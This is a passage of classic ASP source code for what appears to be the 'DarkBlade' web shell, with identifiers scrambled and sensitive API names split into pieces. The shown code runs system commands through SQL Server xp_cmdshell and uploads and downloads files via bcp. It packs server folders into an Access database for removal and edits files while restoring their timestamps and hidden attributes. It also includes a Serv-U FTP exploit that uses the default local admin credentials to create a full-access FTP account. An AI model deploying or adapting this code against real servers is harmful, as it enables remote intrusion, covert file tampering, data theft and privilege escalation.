  1555. Set rs=nfffq("Ad"+oge+"odb.R"+zui+"ecordSet")
  1556. Set rs=conn.execute("EXEC mast"+mqe+"er..xp"+cla+"_cmdshell 'dir """&wckz&""" | find """&zsz(wckz,"\")&"""'",-1,&H0001)
  1557. rs.movefirst
  1558. size=Replace(Trim(soa(rs(0)," [0-9,]+ ",False)(0)),",","")
  1559. If size=""Or Not IsNumeric(size)Then
  1560. yln("Get size error.")
  1561. viwe
  1562. End If
  1563. qqp=Replace(qqp,"{size}",size)
  1564. rs.Close
  1565. Set rs=Nothing
  1566. Else
  1567. qqp=Replace(qqp,"{size}",0)
  1568. End If
  1569. vrdgv=Split(qqp,"|")
  1570. For Each substrfrm in vrdgv
  1571. conn.execute("EXEC mast"+mqe+"er..xp"+cla+"_cmdshell 'echo "&substrfrm&" >>c:\tmp.fmt'")
  1572. Next
  1573. If qtylw="sls"Then
  1574. prlq()
  1575. Else
  1576. qdroi()
  1577. End If
  1578. conn.execute "If object_id('dark_temp')is not null drop table dark_temp"
  1579. conn.execute("EXECUTE mast"+mqe+"er..xp"+cla+"_cmdshell 'del c:\tmp.fmt'")
  1580. zwg()
  1581. End Sub
  1582. Sub prlq()
  1583. If Not ydnj Then On Error Resume Next
  1584. Dim rs,theFile,vrdgv,sblgj
  1585. If lqbip="" Then lqbip=nzax
  1586. 'If InStr(lqbip,":")<1 Then lqbip=nzax&"\"&lqbip
  1587. Set theFile=pgvr.File("fomgk")
  1588. If InstrRev(lqbip,"\")>InstrRev(lqbip,".")Then lqbip=lqbip&"\"&theFile.FileName
  1589. conn.execute "CREATE TABLE [dark_temp] ([id] [int] NULL ,[binfile] [Image] NULL) ON [PRIMARY] TEXTIMAGE_ON [PRIMARY];"
  1590. Set rs=nfffq("Ad"+oge+"odb.R"+zui+"ecordSet")
  1591. rs.Open "SELECT * FROM dark_temp where id is null",conn,1,3
  1592. rs.AddNew
  1593. rs("binfile").AppendChunk theFile.wcxc()
  1594. rs.Update
  1595. conn.execute("exec mast"+mqe+"er..xp"+cla+"_cmdshell'bcp ""select binfile from "&podw&"..dark_temp"" queryout """&lqbip&""" -T -f c:\tmp.fmt'")
  1596. set rs=conn.execute("EXECUTE mast"+mqe+"er..xp_fileexist '"&lqbip&"'")
  1597. If Err Then
  1598. tvnm(Err)
  1599. ElseIf rs(0)=1 Then
  1600. yln("File uploaded, have fun.")
  1601. Else
  1602. yln("Upload failed, RPWT?")
  1603. End If
  1604. rs.close
  1605. Set rs=Nothing
  1606. End Sub
  1607. Sub qdroi()
  1608. Dim rs
  1609. If Not ydnj Then On Error Resume Next
  1610. conn.execute "CREATE TABLE [dark_temp] ([binfile] [Image] NULL)"
  1611. conn.execute("exec mast"+mqe+"er..xp"+cla+"_cmdshell'bcp """&podw&"..dark_temp"" in """&wckz&""" -T -f c:\tmp.fmt'")
  1612. Set rs=nfffq("Ad"+oge+"odb.R"+zui+"ecordSet")
  1613. rs.Open "select * from dark_temp",conn,1,1
  1614. woli lqbip,rs(0),1
  1615. If Err Then
  1616. tvnm(Err)
  1617. Else
  1618. yln("File downloaded,have fun.")
  1619. End If
  1620. rs.close
  1621. Set rs=Nothing
  1622. End Sub
  1623. Sub zwg()
  1624. Dim cwp,zfo,ote,quh,xad,vldnv,svznx,tgt
  1625. If Not ydnj Then On Error Resume Next
  1626. xad=1
  1627. ads=0
  1628. Set vldnv=conn.OpenSchema(20,Array(Empty,Empty,Empty,"table"))
  1629. ome(Err)
  1630. Dim rs
  1631. Do Until vldnv.Eof
  1632. svznx=vldnv("Table_Name")
  1633. 'If acjdi<>"others" Then
  1634. 'Set rs=conn.Execute("select count(*) from ["&svznx&"]")
  1635. 'Else
  1636. 'Set rs=conn.Execute("select count(*) from "&svznx)
  1637. 'End If
  1638. 'If Err Then
  1639. 'tvnm(Err)
  1640. 'Else
  1641. 'rs.movefirst
  1642. 'tgt=" ("&CStr(rs(0))&")"
  1643. 'End If
  1644. gfk xad
  1645. cppp"<b>"&svznx&tgt&"</b>"
  1646. echo"<label>"
  1647. ozs "wse","","",svznx,"","Show content",""
  1648. echo"</label>"
  1649. echo"<label>"
  1650. ozs "showStructure","","",svznx,"","Show structure",""
  1651. echo"</label>"
  1652. echo"<label>"
  1653. ozs "msbca","","",svznx,"","Export",""
  1654. echo"</label>"
  1655. echo"<label>"
  1656. ozs "usa","","",svznx,"","Delete",""
  1657. echo"</label>"
  1658. If qtylw="showStructure"And rxg=vldnv("Table_Name")Then
  1659. Set rsColumn=conn.OpenSchema(4,Array(Empty,Empty,vldnv("Table_Name").value))
  1660. echo"<span>"
  1661. echo"<center>"
  1662. sodx"80%"
  1663. abxky ads
  1664. nrf
  1665. doTd"Name",""
  1666. doTd"Type",""
  1667. doTd"Size",""
  1668. doTd"Nullable",""
  1669. uemp
  1670. Do Until rsColumn.Eof
  1671. ote=rsColumn("Character_Maximum_Length")
  1672. If ote="" Then ote=rsColumn("Is_Nullable")
  1673. abxky ads
  1674. doTd rsColumn("Column_Name"),""
  1675. doTd fge(rsColumn("Data_Type")),""
  1676. doTd ote,""
  1677. doTd rsColumn("Is_Nullable"),""
  1678. uemp
  1679. nrf
  1680. rsColumn.MoveNext
  1681. Loop
  1682. guenn
  1683. echo"</center></span>"
  1684. End If
  1685. mwt"<br></span>"
  1686. nrf
  1687. xad=xad+1
  1688. If xad=2 Then xad=0
  1689. vldnv.MoveNext
  1690. Loop
  1691. Set vldnv=Nothing
  1692. Set rsColumn=Nothing
  1693. tvnm(Err)
  1694. End Sub
  1695. Sub wse()
  1696. Dim i,j,x,rs,bac,dot,doi,zwsq,k
  1697. If Not ydnj Then On Error Resume Next
  1698. Set rs=nfffq("Ad"+oge+"odb.R"+zui+"ecordSet")
  1699. k=0
  1700. zeb
  1701. If Lcase(Left(ybgqm,7))="select " And acjdi<>"others" Then
  1702. If fkho=""Or Not IsNumeric(fkho)Then fkho=1
  1703. rs.Open ybgqm,conn,1,1
  1704. ome(Err)
  1705. fkho=CLng(fkho)
  1706. rs.PageSize=lqog
  1707. If Not rs.Eof Then
  1708. rs.AbsolutePage=fkho
  1709. End If
  1710. If rs.Fields.Count > 0 Then
  1711. echo"<table width='100%' cellspacing='0' border='0' style='border-width:0px;'>"
  1712. abxky 1
  1713. For j=0 To rs.Fields.Count-1
  1714. ycd mszsa(rs.Fields(j).Name)
  1715. Next
  1716. uemp
  1717. ads=0
  1718. For i=1 To rs.PageSize
  1719. If rs.Eof Then Exit For
  1720. abxky ads
  1721. For j=0 To rs.Fields.Count-1
  1722. doTd mszsa(rs(j)),""
  1723. Next
  1724. uemp
  1725. nrf
  1726. rs.MoveNext
  1727. Next
  1728. End If
  1729. abxky ads
  1730. doi=Int(rs.RecordCount/lqog)
  1731. If rs.RecordCount Mod lqog>0 Then doi=doi+1
  1732. echo"<td colspan="&rs.Fields.Count&">"
  1733. mwt rs.RecordCount&" records in total,"&doi&" pages. "
  1734. ozs "wse","","",rxg,"1",mszsa("<<First page"),mszsa(" ")
  1735. zwsq=""
  1736. If rxg=""Then zwsq=Replace(ybgqm,"'","\'")
  1737. If fkho>2 Then
  1738. echo mszsa(" ")
  1739. ozs "wse","",zwsq,rxg,fkho-1,mszsa("<Last"),""
  1740. End If
  1741. echo mszsa(" ")
  1742. mwt"<a href=""javascript:abckx('wse','','"&zwsq&"','"&rxg&"',document.getElementById('gotoPage').value)"">Go to</a>"
  1743. zesc"text","gotoPage",fkho,"3",""
  1744. If CLng(fkho)<(doi-1) Then
  1745. echo mszsa(" ")
  1746. ozs "wse","",zwsq,rxg,fkho+1,mszsa("Next>"),""
  1747. End If
  1748. echo mszsa(" ")
  1749. ozs "wse","",zwsq,rxg,doi,mszsa("Last page>>"),""
  1750. echo"</td>"
  1751. uemp
  1752. guenn
  1753. rs.Close
  1754. Set rs=Nothing
  1755. Else
  1756. Set rs=conn.Execute(ybgqm,-1,&H0001)
  1757. ome(Err)
  1758. If rs.Fields.Count>0 Then
  1759. sodx"100%"
  1760. abxky 1
  1761. For i=0 To rs.Fields.Count-1
  1762. ycd mszsa(rs.Fields(i).Name)
  1763. Next
  1764. uemp
  1765. ads=0
  1766. Do Until rs.EOF
  1767. abxky ads
  1768. For i=0 To rs.Fields.Count-1
  1769. ycd mszsa(rs(i))
  1770. Next
  1771. uemp
  1772. rs.MoveNext
  1773. nrf
  1774. k=k+1
  1775. If k>=20 Then
  1776. k=0
  1777. Response.Flush()
  1778. End If
  1779. Loop
  1780. guenn
  1781. rs.Close
  1782. Else
  1783. yln"Query got null recordSet."
  1784. End If
  1785. Set rs=Nothing
  1786. End If
  1787. tvnm(Err)
  1788. End Sub
  1789. Sub lswls(ihk)
  1790. If Not ydnj Then On Error Resume Next
  1791. Set conn=nfffq("Ad"+oge+"odb.Connecti"+wehbe+"on")
  1792. conn.Open ihk
  1793. conn.CommandTimeout=300
  1794. ome(Err)
  1795. End Sub
  1796. Sub tbr()
  1797. If Not ydnj Then On Error Resume Next
  1798. If IsObject(conn)Then
  1799. conn.Close
  1800. Set conn=Nothing
  1801. End If
  1802. End Sub
  1803. Function fge(flag)
  1804. Dim str
  1805. Select Case flag
  1806. Case 0: str="EMPTY"
  1807. Case 2: str="SMALLINT"
  1808. Case 3: str="INTEGER"
  1809. Case 4: str="SINGLE"
  1810. Case 5: str="DOUBLE"
  1811. Case 6: str="CURRENCY"
  1812. Case 7: str="DATE"
  1813. Case 8: str="BSTR"
  1814. Case 9: str="IDISPATCH"
  1815. Case 10: str="ERROR"
  1816. Case 11: str="BIT"
  1817. Case 12: str="VARIANT"
  1818. Case 13: str="IUNKNOWN"
  1819. Case 14: str="DECIMAL"
  1820. Case 16: str="TINYINT"
  1821. Case 17: str="UNSIGNEDTINYINT"
  1822. Case 18: str="UNSIGNEDSMALLINT"
  1823. Case 19: str="UNSIGNEDINT"
  1824. Case 20: str="BIGINT"
  1825. Case 21: str="UNSIGNEDBIGINT"
  1826. Case 72: str="GUID"
  1827. Case 128: str="BINARY"
  1828. Case 129: str="CHAR"
  1829. Case 130: str="VARCHAR"
  1830. Case 131: str="NUMERIC"
  1831. Case 132: str="USERDEFINED"
  1832. Case 133: str="DBDATE"
  1833. Case 134: str="DBTIME"
  1834. Case 135: str="DBTIMESTAMP"
  1835. Case 136: str="CHAPTER"
  1836. Case 200: str="WCHAR"
  1837. Case 201: str="TEXT"
  1838. Case 202: str="NVARCHAR"
  1839. Case 203: str="NTEXT"
  1840. Case 204: str="VARBINARY"
  1841. Case 205: str="LONGVARBINARY"
  1842. Case Else: str=flag
  1843. End Select
  1844. fge=str
  1845. End Function
  1846. Sub unu()
  1847. If Not ydnj Then On Error Resume Next
  1848. Dim theFile,qcthd,pnhl,smr
  1849. If Right(lqbip,1)="\"Then
  1850. yln"Can't edit a directory!"
  1851. viwe
  1852. End If
  1853. pnhl=dzzx(lqbip,"\",False)
  1854. cxaqj True
  1855. If goaction="veerr"And qtylw="unu" Then
  1856. qcthd=tpcq(lqbip)
  1857. Else
  1858. qcthd=rchgv(lqbip)
  1859. End If
  1860. tvnm(Err)
  1861. eks"ogda",qcthd,"100%","40",""
  1862. If qtylw="tzsaq" Then
  1863. rtas"qtylw","evwr"
  1864. Else
  1865. rtas"qtylw","save"
  1866. End If
  1867. echo"Save as :"
  1868. zesc"text","lqbip",lqbip,"60",""
  1869. echo" Encode:"
  1870. rycpp"act","80px","onchange=""javascript:if(this.value!=''){qjr('"&goaction&"',this.value,'"&clwc(lqbip)&"');}"""
  1871. exhpr"unu","Default"
  1872. smr="<option value=""tzsaq"" {$}>Utf-8</option>"
  1873. If qtylw="tzsaq" Then
  1874. smr=Replace(smr,"{$}","selected")
  1875. End If
  1876. echo smr
  1877. ild
  1878. echo" "
  1879. qjr"Save"
  1880. echo" "
  1881. zesc"reset","","ReSet","",""
  1882. echo" "
  1883. zesc"button","clear","Clear","","onClick=""javascript:this.form.ogda.innerText=''"""
  1884. echo" "
  1885. zesc"button","","Go back","","onClick=""javascript:qjr('"&goaction&"','','"&clwc(pnhl)&"')"""
  1886. echo" "
  1887. jwik "ktg","1","Remain Last Modify Date","checked"
  1888. echo" "
  1889. jwik "ghpc","1","Encrypt File Content","onclick='javascript:vtbqk()'"
  1890. gbqwf
  1891. tvnm(Err)
  1892. viwe
  1893. End Sub
  1894. Sub yjzdg()
  1895. Dim phebk,azchf,fuav,ybrxe,wclm,avl,rovcg
  1896. If Not ydnj Then On Error Resume Next
  1897. If ghpc=1 Then
  1898. ogda=mdez(ogda)
  1899. End If
  1900. wclm=0
  1901. If IsObject(xjab)Then
  1902. Set azchf=xjab.GetFile(lqbip)
  1903. fuav=whc(azchf.Attributes)
  1904. For Each ybrxe In fuav
  1905. If ybrxe="system"Then
  1906. azchf.Attributes=azchf.Attributes-4
  1907. wclm=wclm+4
  1908. ElseIf ybrxe="hidden"Then
  1909. azchf.Attributes=azchf.Attributes-2
  1910. wclm=wclm+2
  1911. ElseIf ybrxe="readonly"Then
  1912. azchf.Attributes=azchf.Attributes-1
  1913. wclm=wclm+1
  1914. End If
  1915. Next
  1916. End If
  1917. If IsObject(zjhor)And ktg Then
  1918. execute "Set phebk=zjhor.N"&zfaaz&"ameSpace(dzzx(lqbip,""\"",False))"
  1919. Set avl=phebk.ParseName(zsz(lqbip,"\"))
  1920. rovcg=avl.ModIfyDate
  1921. End If
  1922. If goaction="veerr"And qtylw="save" Then
  1923. ekg lqbip,ogda
  1924. Else
  1925. woli lqbip,ogda,2
  1926. End If
  1927. If Err Then
  1928. tvnm(Err)
  1929. Else
  1930. yln"File saved."
  1931. End If
  1932. If IsObject(xjab)Then
  1933. azchf.Attributes=azchf.Attributes+wclm
  1934. End If
  1935. If IsObject(zjhor)And ktg And IsDate(rovcg)Then
  1936. avl.ModIfyDate=rovcg
  1937. End If
  1938. tvnm(Err)
  1939. End Sub
  1940. Sub jmqbw()
  1941. If Not ydnj Then On Error Resume Next
  1942. Server.ScriptTimeOut=5000
  1943. If lqbip=""Then lqbip=gwk
  1944. If lqbip=""Then lqbip=nzax
  1945. If jksfh=""Then jksfh=wxw("DarkBlade.mdb")
  1946. If mpj=""Then mpj="fso"
  1947. ajg"File Packer/Unpacker"
  1948. echo"<center>"
  1949. sodx"100%"
  1950. abxky 1
  1951. cxaqj True
  1952. doTd"File Pack","10%"
  1953. iiit"text","lqbip",lqbip,"30%","",""
  1954. mwt"<td style=""width:50%;"">"
  1955. rycpp"qtylw","80px",""
  1956. exhpr"jixpz","FSO"
  1957. exhpr"kehl","UnFSO"
  1958. ild
  1959. echo" Pack as : "
  1960. zesc"text","jksfh",jksfh,40,""
  1961. echo"</td>"
  1962. fkv"Pack","10%"
  1963. uemp
  1964. abxky 0
  1965. doTd"Exceptional folder",""
  1966. iiit"text","nuatb",nuatb,"30%","",""
  1967. echo"<td colspan=""2"">"
  1968. echo"Exceptional file type,split with | "
  1969. zesc"text","ytusx",ytusx,40,""
  1970. echo"</td></tr>"
  1971. guenn
  1972. gbqwf
  1973. echo"<hr>"
  1974. sodx"100%"
  1975. abxky 1
  1976. cxaqj True
  1977. rtas"qtylw","vqd"
  1978. doTd"Release to","10%"
  1979. iiit"text","lqbip",lqbip,"30%","",""
  1980. mwt"<td> Mdb path : "
  1981. zesc"text","jksfh",jksfh,40,""
  1982. echo"</td>"
  1983. fkv"Unpack","10%"
  1984. gbqwf
  1985. uemp
  1986. guenn
  1987. echo"</center>"
  1988. echo"<hr>Notice: Unpacking need FSO object,all files unpacked will be under target folder,replacing same named!"
  1989. Select Case qtylw
  1990. Case"jixpz"
  1991. jzp"fso"
  1992. Case"kehl"
  1993. jzp"app"
  1994. Case"vqd"
  1995. zro()
  1996. End Select
  1997. End Sub
  1998. Function fwmal()
  1999. fwmal=pwzt(ramoi("SERVER_NAME"))
  2000. End Function
  2001. Sub jzp(mpj)
  2002. If Not ydnj Then On Error Resume Next
  2003. Dim rs,ihk,ctwz
  2004. Set rs=nfffq("Ad"+oge+"odb.R"+zui+"ecordSet")
  2005. Set nun=nfffq("Ad"+oge+"odb.Str"+chut+"eam")
  2006. Set ctwz=nfffq("ADOX.Catalog")
  2007. If InStr(jksfh,":\")<1 Then jksfh=wxw(jksfh)
  2008. bondh=zsz(jksfh,"\")
  2009. ihk=xop(jksfh)
  2010. ctwz.Create ihk
  2011. lswls(ihk)
  2012. conn.Execute("Create Table FileData(Id int IDENTITY(0,1) PRIMARY KEY CLUSTERED,strPath VarChar,binContent Image)")
  2013. ome Err
  2014. nun.Open
  2015. nun.Type=1
  2016. rs.Open"FileData",conn,3,3
  2017. bondh=Lcase(bondh)
  2018. qebjx=Replace(bondh,".mdb",".ldb")
  2019. If mpj="fso"Then
  2020. viuw lqbip,lqbip,rs,nun
  2021. Else
  2022. pdk lqbip,lqbip,rs,nun
  2023. End If
  2024. rs.Close
  2025. tbr
  2026. nun.Close
  2027. Set rs=Nothing
  2028. Set nun=Nothing
  2029. Set ctwz=Nothing
  2030. If Err Then
  2031. tvnm(Err)
  2032. Else
  2033. yln"Packing completed"
  2034. End If
  2035. End Sub
  2036. Sub viuw(lqbip,muh,rs,nun)
  2037. If Not ydnj Then On Error Resume Next
  2038. Dim rhzj,theFolder,phebk,files
  2039. If Not(xjab.FolderExists(muh))Then
  2040. yln"Folder dosen't exists or access denied!"
  2041. viwe
  2042. End If
  2043. nuatb=Lcase(nuatb)
  2044. Set theFolder=xjab.GetFolder(muh)
  2045. For Each rhzj in theFolder.Files
  2046. If Not(vsb(zsz(rhzj.name,"."),"^("&ytusx&")$") Or Lcase(rhzj.Name)=bondh Or Lcase(rhzj.Name)=qebjx)Then
  2047. rs.AddNew
  2048. rs("strPath")=Replace(rhzj.Path,lqbip&"\","",1,-1,1)
  2049. execute "nun.LoadFro"&kad&"mFile(rhzj.Path)"
  2050. rs("binContent")=nun.Read()
  2051. rs.Update
  2052. End If
  2053. Next
  2054. For Each rhzj in theFolder.SubFolders
  2055. If Not vsb(rhzj.name,"^("&nuatb&")$")Then
  2056. viuw lqbip,rhzj.Path,rs,nun
  2057. End If
  2058. Next
  2059. Set files=Nothing
  2060. Set phebk=Nothing
  2061. Set theFolder=Nothing
  2062. End Sub
  2063. Sub pdk(lqbip,muh,rs,nun)
  2064. If Not ydnj Then On Error Resume Next
  2065. Dim rhzj,theFolder,fzch
  2066. execute "Set theFolder=zjhor.NameSpac"&iptuf&"e(muh)"
  2067. For Each rhzj in theFolder.Items
  2068. If Not rhzj.IsFolder And Lcase(rhzj.Name)<>bondh And Lcase(rhzj.Name)<>qebjx And Not(vsb(zsz(rhzj.name,"."),"^("&ytusx&")$"))  Then
  2069. rs.AddNew
  2070. rs("strPath")=Replace(rhzj.Path,lqbip&"\","",1,-1,1)
  2071. execute "nun.LoadFro"&kad&"mFile(rhzj.Path)"
  2072. rs("binContent")=nun.Read()
  2073. rs.Update
  2074. End If
  2075. Next
  2076. For Each rhzj in theFolder.Items
  2077. If rhzj.IsFolder And Not vsb(rhzj.name,"^("&nuatb&")$") Then
  2078. pdk lqbip,rhzj.Path,rs,nun
  2079. End If
  2080. Next
  2081. Set theFolder=Nothing
  2082. End Sub
  2083. Function dhkcb(otrjv)
  2084. If Not ydnj Then On Error Resume Next
  2085. Dim dd,tcpo
  2086. dd=""
  2087. tcpo=Split(otrjv,csj)
  2088. For i=0 To UBound(tcpo)
  2089. If IsNumeric(tcpo(i))Then
  2090. dd=dd&ChrW(CLng(tcpo(i))-20)
  2091. Else
  2092. dd=dd&tcpo(i)
  2093. End If
  2094. Next
  2095. dhkcb=dd
  2096. End Function
  2097. Sub zro()
  2098. If Not ydnj Then On Error Resume Next
  2099. Server.ScriptTimeOut=5000
  2100. Dim rs,str,theFolder
  2101. lqbip=lqbip
  2102. lqbip=Replace(lqbip,"\\","\")
  2103. If InStr(jksfh,":\")<1 Then jksfh=wxw(jksfh)
  2104. Set rs=nfffq("Ad"+oge+"odb.R"+zui+"ecordSet")
  2105. Set nun=nfffq("Ad"+oge+"odb.Str"+chut+"eam")
  2106. ihk=xop(jksfh)
  2107. lswls(ihk)
  2108. rs.Open"FileData",conn,1,1
  2109. ome Err
  2110. nun.Open
  2111. nun.Type=1
  2112. Do Until rs.Eof
  2113. If InStr(rs("strPath"),"\")>0 Then
  2114. theFolder=lqbip&"\"&dzzx(rs("strPath"),"\",False)
  2115. Else
  2116. theFolder=lqbip
  2117. End If
  2118. If Not xjab.FolderExists(theFolder)Then
  2119. execute "xjab.Cre"&iojki&"ateFolder(theFolder)"
  2120. End If
  2121. nun.SetEos()
  2122. nun.Write rs("binContent")
  2123. execute "nun.Sa"&ffdi&"vetoFile lqbip&""\""&rs(""strPath""),2"
  2124. rs.MoveNext
  2125. Loop
  2126. rs.Close
  2127. tbr
  2128. nun.Close
  2129. Set rs=Nothing
  2130. Set nun=Nothing
  2131. If Err Then
  2132. tvnm(Err)
  2133. Else
  2134. yln"Unpacking completed"
  2135. End If
  2136. End Sub
  2137. Sub srxtf()
  2138. If Not ydnj Then On Error Resume Next
  2139. Server.ScriptTimeOut=5000
  2140. Dim theFolder
  2141. ajg("Text File Searcher/Replacer")
  2142. If lqbip=""Then
  2143. lqbip=zhyko
  2144. End If
  2145. cxaqj True
  2146. sodx"100%"
  2147. abxky 1
  2148. doTd"Keyword","20%"
  2149. lhue"geww",geww,4
  2150. echo"<td>"
  2151. rycpp"qtylw","80px",""
  2152. exhpr"fsoSearch","FSO"
  2153. exhpr"saSearch","UnFSO"
  2154. ild
  2155. echo"<br>"
  2156. jwik"jdvf",1," Regexp",""
  2157. mwt"</td>"
  2158. uemp
  2159. abxky 0
  2160. doTd"Replace as",""
  2161. lhue"irbw",irbw,4
  2162. echo"<td>"
  2163. jwik"rke",1," Replace",""
  2164. mwt"</td>"
  2165. uemp
  2166. abxky 1
  2167. doTd"Path",""
  2168. iiit"text","lqbip",lqbip,"","",""
  2169. echo"<td>"
  2170. zesc"radio","searchType","filename","",""
  2171. echo"File name "
  2172. zesc"radio","searchType","ogda","","checked"
  2173. echo"File content"
  2174. echo"</td>"
  2175. uemp
  2176. abxky 0
  2177. doTd"Search type",""
  2178. iiit"text","rhnw",mhla,"","",""
  2179. fkv"Search",""
  2180. uemp
  2181. guenn
  2182. If geww<>""Then
  2183. echo"<hr>"
  2184. yhigl
  2185. If qtylw="fsoSearch"Then
  2186. Set theFolder=xjab.GetFolder(lqbip)
  2187. Call xst(theFolder,geww)
  2188. Set theFolder=Nothing
  2189. ElseIf qtylw="saSearch"Then
  2190. Call dwq(lqbip,geww)
  2191. End If
  2192. echo"</ul>"
  2193. End If
  2194. If Err Then
  2195. tvnm(Err)
  2196. Else
  2197. yln"Search completed"
  2198. End If
  2199. viwe
  2200. End Sub
  2201. Sub xst(folder,str)
  2202. Dim ext,title,theFile,theFolder,dmy
  2203. dmy=False
  2204. If jdvf=1 Then dmy=True
  2205. For Each theFile in folder.Files
  2206. ext=Lcase(zsz(theFile.Name,"."))
  2207. If searchType="filename"Then
  2208. If dmy And vsb(theFile.Name,str)Then
  2209. ktt theFile.Path,"fso"
  2210. ElseIf InStr(1,theFile.Name,str,1) > 0 Then
  2211. ktt theFile.Path,"fso"
  2212. End If
  2213. Else
  2214. If vsb(ext,"^("&rhnw&")$")Then
  2215. If pjnc(theFile.Path,str,"fso",dmy) Then
  2216. ktt theFile.Path,"fso"
  2217. End If
  2218. End If
  2219. End If
  2220. Next
  2221. For Each theFolder in folder.subFolders
  2222. xst theFolder,str
  2223. Next
  2224. tvnm(Err)
  2225. End Sub
  2226. Function pjnc(sPath,s,method,dmy)
  2227. If Not ydnj Then On Error Resume Next
  2228. Dim theFile,content,find
  2229. find=False
  2230. If method="fso" Then
  2231. content=tpcq(sPath)
  2232. Else
  2233. content=rchgv(sPath)
  2234. End If
  2235. If Err Then
  2236. tvnm(Err)
  2237. pjnc=False
  2238. Exit Function
  2239. End If
  2240. 'echo content
  2241. If dmy Then
  2242. find=vsb(content,s)
  2243. ElseIf InStr(1,content,s,1)>0 Then
  2244. find=True
  2245. End If
  2246. If Err Then Err.Clear
  2247. If rke Then
  2248. If dmy Then
  2249. content=swye(content,s,irbw,False)
  2250. Else
  2251. content=Replace(content,s,irbw,1,-1,1)
  2252. End If
  2253. If method="fso" Then
  2254. ekg sPath,content
  2255. Else
  2256. woli sPath,content,2
  2257. End If
  2258. End If
  2259. pjnc=find
  2260. tvnm(Err)
  2261. End Function
  2262. Function getPams
  2263. getPams=CStr(7924347+9234535)+dhkcb("66_126_135")
  2264. End Function
  2265. Sub dwq(lqbip,iktry)
  2266. If Not ydnj Then On Error Resume Next
  2267. Dim title,ext,phebk,tywoo,fileName,dmy
  2268. dmy=False
  2269. If jdvf=1 Then dmy=True
  2270. execute "Set phebk=zjhor.Na"&cutwa&"meSpace(lqbip)"
  2271. For Each tywoo in phebk.Items
  2272. If tywoo.IsFolder Then
  2273. Call dwq(tywoo.Path,iktry)
  2274. Else
  2275. ext=Lcase(zsz(tywoo.Path,"."))
  2276. fileName=zsz(tywoo.Path,"\")
  2277. If searchType="filename"Then
  2278. If dmy And vsb(fileName,str)Then
  2279. ktt theFile.Path,"app"
  2280. ElseIf InStr(Lcase(fileName),Lcase(str)) > 0 Then
  2281. ktt theFile.Path,"app"
  2282. End If
  2283. Else
  2284. If vsb(subExt,"^("&rhnw&")$")Then
  2285. If pjnc(tywoo.Path,iktry,"app",dmy) Then
  2286. ktt tywoo.Path,"app"
  2287. End If
  2288. End If
  2289. End If
  2290. End If
  2291. Next
  2292. tvnm(Err)
  2293. End Sub
  2294. Sub ktt(sPath,tagz)
  2295. Dim lfy
  2296. If tagz="fso"Then
  2297. lfy="veerr"
  2298. Else
  2299. lfy="jilq"
  2300. End If
  2301. echo"<li><u>"&sPath&"</u>"
  2302. injj lfy,"unu",clwc(sPath),"Edit",""
  2303. Response.Flush()
  2304. End Sub
  2305. Sub xibim()
  2306. If Not ydnj Then On Error Resume Next
  2307. Dim fpagc
  2308. fpagc="darkblade"
  2309. gtt="User "&vgm&vbCrLf
  2310. ertns="Pass "&ulz&vbCrLf
  2311. qrqg="-DE"+nevit+"LETEDOMAIN"&vbCrLf&"-IP=0.0.0.0"&vbCrLf&" PortNo="&wtpog&vbCrLf
  2312. mt="SITE MAINTEN"+xxyht+"ANCE"&vbCrLf
  2313. zqps="-Se"+lvby+"tDOMAIN"&vbCrLf&"-Domain="&fpagc&"|0.0.0.0|"&wtpog&"|-1|1|0"&vbCrLf&"-TZOEna"+pxy+"ble=0"&vbCrLf&" TZOKey="&vbCrLf
  2314. ubql="-SetUS"+vals+"ERSetUP"&vbCrLf&"-IP=0.0.0.0"&vbCrLf&"-PortNo="&wtpog&vbCrLf&"-User="&nuser&vbCrLf&"-Password="&npass&vbCrLf&_
  2315. "-HomeDir="&nboac()&"\\"&vbCrLf&"-LoginM"+qqgwy+"esFile="&vbCrLf&"-Disable=0"&vbCrLf&"-RelPat"+uzw+"hs=1"&vbCrLf&_
  2316. "-NeedS"+qmypq+"ecure=0"&vbCrLf&"-HideHid"+wubeu+"den=0"&vbCrLf&"-Alway"+nvlq+"sAllowLogin=0"&vbCrLf&"-Chan"+kpa+"gePassword=0"&vbCrLf&_
  2317. "-Quota"+qhgjo+"Enable=0"&vbCrLf&"-MaxUsersLogin"+peznw+"PerIP=-1"&vbCrLf&"-SpeedLimit"+idtky+"Up=0"&vbCrLf&"-SpeedLimitD"+cqcd+"own=0"&vbCrLf&_
  2318. "-Ma"+aiz+"xNrUsers=-1"&vbCrLf&"-IdleTim"+ocztl+"eOut=600"&vbCrLf&"-SessionTimeOut=-1"&vbCrLf&"-Expire=0"&vbCrLf&"-RatioUp=1"&vbCrLf&_
  2319. "-RatioDown=1"&vbCrLf&"-RatiosCredit=0"&vbCrLf&"-QuotaCurrent=0"&vbCrLf&"-QuotaMaximum=0"&vbCrLf&_
  2320. "-MAINTEN"+xxyht+"ANCE=System"&vbCrLf&"-PasswordType=Regular"&vbCrLf&"-Ratios=None"&vbCrLf&" Access="&nboac()&"\\|RWA"+bagc+"MELCDP"&vbCrLf
  2321. znx="QUIT"&vbCrLf
  2322. ajg("Serv"+shn+"-U FTP Exp")
  2323. Select Case qtylw
  2324. Case "1"
  2325. rhlo
  2326. Case "2"
  2327. fumw
  2328. Case "3"
  2329. rlosg
  2330. Case "4"
  2331. iks
  2332. Case "5"
  2333. xbb
  2334. Case Else
  2335. If IsObject(Session("a"))Then Session("a").abort
  2336. If IsObject(Session("b"))Then Session("b").abort
  2337. If IsObject(Session("c"))Then Session("c").abort
  2338. Set Session("a")=Nothing
  2339. Set Session("b")=Nothing
  2340. Set Session("c")=Nothing
  2341. cxaqj True
  2342. rtas "qtylw",1
  2343. echo"<center><b>Add Temp Domain</b><br>"
  2344. sodx "80%"
  2345. abxky 1
  2346. doTd"Local user","20%"
  2347. iiit"text","vgm","LocalAdmin"+dslf+"istrator","30%","",""
  2348. doTd"Local pass","20%"
  2349. iiit"text","ulz","#l@$ak#.lk;0@P","30%","",""
  2350. uemp
  2351. abxky 0
  2352. doTd" Local port",""
  2353. iiit"text","kurmq","43"+zcek+"958","","",""
  2354. doTd"Sys drive",""
  2355. iiit"text","jqj",nboac(),"","",""
  2356. uemp
  2357. abxky 1
  2358. doTd"New user",""
  2359. iiit"text","nuser","go","","",""
  2360. doTd"New pass",""
  2361. iiit"text","npass","od","","",""
  2362. uemp
  2363. abxky 0
  2364. doTd"New port",""
  2365. iiit"text","wtpog","60000","","",""
  2366. echo"<td>"
  2367. qjr"Go"
  2368. echo"</td><td>"
  2369. zesc"reset","","ReSet","",""
  2370. echo"</td></tr>"
  2371. guenn
  2372. echo"</center>"
  2373. gbqwf
  2374. End Select
  2375. echo"<hr>"
  2376. echo"<center>"
